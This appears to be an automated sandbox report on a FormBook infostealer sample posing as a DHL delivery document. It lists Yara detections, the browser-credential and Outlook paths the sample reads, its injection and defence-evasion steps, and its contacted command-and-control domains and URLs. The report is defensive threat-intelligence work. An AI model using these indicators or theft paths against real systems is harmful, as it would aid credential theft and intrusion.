Source: Yara match File source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\setx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\setx.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446732 Sample: DHL_Delivery Documents.exe Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 55 www.uzonedich.com 2->55 57 www.prospin.click 2->57 59 3 other IPs or domains 2->59 69 Snort IDS alert for network traffic 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Sigma detected: Scheduled temp file as task from temp location 2->73 75 11 other signatures 2->75 10 DHL_Delivery Documents.exe 7 2->10         started        14 YybGLWQSx.exe 5 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\YybGLWQSx.exe, PE32 10->51 dropped 53 C:\Users\user\AppData\Local\...\tmp3106.tmp, XML 10->53 dropped 85 Adds a directory exclusion to Windows Defender 10->85 16 DHL_Delivery Documents.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        87 Multi AV Scanner detection for dropped file 14->87 89 Machine Learning detection for dropped file 14->89 25 schtasks.exe 1 14->25         started        27 YybGLWQSx.exe 14->27         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 16->65 29 OoIHIwIlaOHZFTFWeSHYCjEJ.exe 16->29 injected 67 Loading BitLocker PowerShell Module 19->67 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 91 Found direct / indirect Syscall (likely to bypass EDR) 29->91 42 setx.exe 13 29->42         started        process11 signatures12 77 Tries to steal Mail credentials (via file / registry access) 42->77 79 Tries to harvest and steal browser information (history, passwords, etc) 42->79 81 Modifies the context of a thread in another process (thread injection) 42->81 83 2 other signatures 42->83 45 OoIHIwIlaOHZFTFWeSHYCjEJ.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 61 www.uzonedich.com 103.48.135.8, 49710, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Hong Kong 45->61 63 www.alexbruma.com 172.67.214.17, 49711, 49712, 49713 CLOUDFLARENETUS United States 45->63 93 Found direct / indirect Syscall (likely to bypass EDR) 45->93 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.214.17
 www.alexbruma.com United States
13335 CLOUDFLARENETUS false
103.48.135.8
 www.uzonedich.com Hong Kong
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true

Contacted Domains

Name IP Active
www.uzonedich.com 103.48.135.8 true
www.alexbruma.com 172.67.214.17 true
www.prospin.click unknown unknown
www.bookingshop01.top unknown unknown
www.7egiy1.cfd unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.alexbruma.com/0eyj/ false
  • Avira URL Cloud: safe
 unknown
http://www.uzonedich.com/ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI true
  • Avira URL Cloud: safe
 unknown
http://www.alexbruma.com/0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI false
  • Avira URL Cloud: safe
 unknown